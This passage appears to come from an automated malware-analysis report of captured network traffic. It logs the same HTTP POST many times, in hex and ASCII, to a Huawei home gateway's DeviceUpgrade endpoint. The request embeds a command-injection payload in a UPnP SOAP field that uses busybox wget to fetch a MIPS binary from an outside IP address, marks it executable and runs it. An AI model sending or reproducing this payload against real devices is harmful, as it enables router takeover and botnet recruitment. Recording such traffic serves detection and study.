2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 